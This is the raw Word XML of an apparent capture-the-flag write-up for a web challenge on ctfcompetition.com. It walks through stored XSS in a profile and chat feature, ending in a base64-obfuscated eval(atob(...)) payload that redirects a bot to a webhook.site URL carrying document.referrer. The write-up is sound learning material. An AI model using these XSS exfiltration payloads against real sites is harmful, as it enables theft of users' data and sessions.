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11C69" w14:textId="1E7C5FB7" w:rsidR="00E4168F" w:rsidRDefault="00E4168F" w:rsidP="002E28AB">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploring the details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2470A2BC" w14:textId="32558C9F" w:rsidR="00E4168F" w:rsidRDefault="00E4168F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E4168F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59BF90DF" wp14:editId="2525B320">
            <wp:extent cx="3988005" cy="280684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79DE" w14:textId="77777777" w:rsidR="00E4168F" w:rsidRPr="00E4168F" w:rsidRDefault="00E4168F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6811111E" w14:textId="1FFDF6C8" w:rsidR="00C90536" w:rsidRPr="00E4168F" w:rsidRDefault="002E28AB" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002E28AB">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00E4168F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002E28AB">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E4168F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E4168F">
        <w:t>Entering the challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13021314" w14:textId="41DDFDD2" w:rsidR="002E28AB" w:rsidRDefault="00E4168F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E4168F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3569EAD3" wp14:editId="132BEBF4">
            <wp:extent cx="6475278" cy="2117300"/>
            <wp:effectExtent l="0" t="0" r="190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4963" cy="21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2672" w14:textId="1F70EFF0" w:rsidR="00E4168F" w:rsidRDefault="00E4168F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>We can see that there is three buttons: Login,Register,About and we need to explore theme.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F1661" w14:textId="3CCF7062" w:rsidR="00E4168F" w:rsidRDefault="00E4168F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D172116" w14:textId="369509A4" w:rsidR="00E4168F" w:rsidRDefault="00E4168F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E4168F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D9F4D1" wp14:editId="0991B9E4">
            <wp:extent cx="4896102" cy="156218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99B2" w14:textId="3294ED2E" w:rsidR="00E4168F" w:rsidRDefault="00E4168F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>We need to enter there!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165BDA7A" w14:textId="0212C51B" w:rsidR="00E4168F" w:rsidRPr="00E4168F" w:rsidRDefault="00E4168F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A0ADCC" w14:textId="4AA1571A" w:rsidR="00E4168F" w:rsidRDefault="00E4168F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Injection of: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4168F">
        <w:t>&lt;img src=X onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" showing pop up message at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Profile,Chat Now!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9763BA" w14:textId="23851ECF" w:rsidR="00E4168F" w:rsidRPr="00952887" w:rsidRDefault="00E4168F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00952887">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CAB434" w14:textId="4B22672C" w:rsidR="00E4168F" w:rsidRDefault="00B4562F" w:rsidP="00E4168F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Injection of: </w:t>
      </w:r>
      <w:r w:rsidR="00952887">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00952887" w:rsidRPr="00952887">
        <w:t xml:space="preserve">&lt;img src = </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00952887" w:rsidRPr="00AB432D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://webhook.site/0cbf4706-3a17-4be8-8527-84f73d924b35</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00952887" w:rsidRPr="00952887">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00952887">
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DCEF56" w14:textId="03EE176E" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>From Profile we get:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005826B" w14:textId="5555DC79" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00952887">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="029877B8" wp14:editId="2E357F00">
            <wp:extent cx="4781796" cy="2673487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E4A6" w14:textId="5D745351" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>From Chat Now we get:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AD3127" w14:textId="0CD5CA25" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00952887">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780754D9" wp14:editId="4C4EF9E6">
            <wp:extent cx="4959605" cy="2959252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9BE7" w14:textId="78C9D463" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So we can see that the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chat Now!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Respond came from another sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5CE67" w14:textId="4B4BB04E" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00952887">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B78112" w14:textId="27A41854" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let's see if the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chat Now!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Have access to flag…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024C5CD6" w14:textId="29CAD92C" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Injection of: &lt;img src = </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00AB432D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://typeselfsub.web.ctfcompetition.com/</w:t>
        </w:r>
        <w:r w:rsidRPr="00AB432D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>flag</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>&gt; we expect to 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FA3C2E" w14:textId="6B2AF7EA" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00952887">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BBF8EC9" wp14:editId="4ED5625A">
            <wp:extent cx="4292821" cy="1314518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ACAA" w14:textId="0004366D" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA8A593" w14:textId="25010521" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now we know that we need to use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chat Now!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to gain for us access to </w:t>
      </w:r>
      <w:r w:rsidRPr="00952887">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E842D" w14:textId="546DDC84" w:rsidR="00952887" w:rsidRDefault="00952887" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After some research we </w:t>
      </w:r>
      <w:r w:rsidR="003A0D86">
        <w:t>decided to inject: "</w:t>
      </w:r>
      <w:r w:rsidR="003A0D86" w:rsidRPr="003A0D86">
        <w:t xml:space="preserve">&lt;img src=X onerror= window.location = "https://webhook.site/0cbf4706-3a17-4be8-8527-84f73d924b35?q=" + document.referrer&gt; </w:t>
      </w:r>
      <w:r w:rsidR="003A0D86">
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6164721C" w14:textId="4AF11D55" w:rsidR="003A0D86" w:rsidRPr="00952887" w:rsidRDefault="003A0D86" w:rsidP="003A0D86">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003A0D86">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EFF13E2" wp14:editId="3AAA7BF3">
            <wp:extent cx="6064562" cy="368319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456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D86">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E254AD3" wp14:editId="77B48C64">
            <wp:extent cx="7887105" cy="533427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8710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EC0D" w14:textId="6E24B871" w:rsidR="00952887" w:rsidRDefault="00CD35EC" w:rsidP="00952887">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We will change the </w:t>
      </w:r>
      <w:r w:rsidRPr="003A0D86">
        <w:t>window.location = "https://webhook.site/0cbf4706-3a17-4be8-8527-84f73d924b35?q=" + document.referrer&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to hex:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F8280" w14:textId="77777777" w:rsidR="00704BE7" w:rsidRDefault="00704BE7" w:rsidP="00CD35EC">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00704BE7">
        <w:t>d2luZG93LmxvY2F0aW9uID0gImh0dHBzOi8vd2ViaG9vay5zaXRlLzBjYmY0NzA2LTNhMTctNGJlOC04NTI3LTg0ZjczZDkyNGIzNT9xPSIgKyBkb2N1bWVudC5yZWZlcnJlcg==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC57248" w14:textId="27BE4CA8" w:rsidR="00CD35EC" w:rsidRDefault="00CD35EC" w:rsidP="00704BE7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>and inject :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C25164" w14:textId="77777777" w:rsidR="003F4E16" w:rsidRDefault="003F4E16" w:rsidP="003F4E16">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003F4E16">
        <w:t>&lt;img src=X onerror=eval(atob("</w:t>
      </w:r>
      <w:r w:rsidRPr="00704BE7">
        <w:t>d2luZG93LmxvY2F0aW9uID0gImh0dHBzOi8vd2ViaG9vay5zaXRlLzBjYmY0NzA2LTNhMTctNGJlOC04NTI3LTg0ZjczZDkyNGIzNT9xPSIgKyBkb2N1bWVudC5yZWZlcnJlcg==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63E636" w14:textId="0FBF9C0B" w:rsidR="00CD35EC" w:rsidRDefault="003F4E16" w:rsidP="00CD35EC">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003F4E16">
        <w:t>"))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D2197A" w14:textId="203E9F32" w:rsidR="003F4E16" w:rsidRDefault="003F4E16" w:rsidP="003F4E16">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>The results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6E111D" w14:textId="50D0A9D8" w:rsidR="003F4E16" w:rsidRDefault="003F4E16" w:rsidP="003F4E16">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003F4E16">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33B8A0A4" wp14:editId="4CF79309">
            <wp:extent cx="4769095" cy="1530429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9AAF" w14:textId="2E6392AE" w:rsidR="003F4E16" w:rsidRDefault="003F4E16" w:rsidP="003F4E16">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003F4E16">
        <w:t>https://typeselfsub.web.ctfcompetition.com/asofdiyboxzdfasdfyryryryccc?username=mike&amp;password=j9as7ya7a3636ncvx&amp;reason={&lt;img src=X onerror=eval(atob("d2luZG93LmxvY2F0aW9uID0gImh0dHBzOi8vd2ViaG9vay5zaXRlLzBjYmY0NzA2LTNhMTctNGJlOC04NTI3LTg0ZjczZDkyNGIzNT9xPSIgKyBkb2N1bWVudC5yZWZlcnJlcg=="))&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFEF04F" w14:textId="39E92A9D" w:rsidR="003F4E16" w:rsidRPr="00952887" w:rsidRDefault="003F4E16" w:rsidP="003F4E16">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003F4E16">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4114A965" wp14:editId="50B351CB">
            <wp:extent cx="5359675" cy="1847945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E16" w:rsidRPr="00952887" w:rsidSect="006C1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36"/>
    <w:rsid w:val="0000523A"/>
    <w:rsid w:val="002E28AB"/>
    <w:rsid w:val="003A0D86"/>
    <w:rsid w:val="003F4E16"/>
    <w:rsid w:val="006C1AE2"/>
    <w:rsid w:val="00704BE7"/>
    <w:rsid w:val="00952887"/>
    <w:rsid w:val="00B4562F"/>
    <w:rsid w:val="00C90536"/>
    <w:rsid w:val="00CD35EC"/>
    <w:rsid w:val="00E4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031E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ADE9BB99-D1B5-44D7-ACF0-F7B44A00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5288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52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webhook.site/0cbf4706-3a17-4be8-8527-84f73d924b35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typeselfsub.web.ctfcompetition.com/fla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300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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-12T09:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-12T11:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>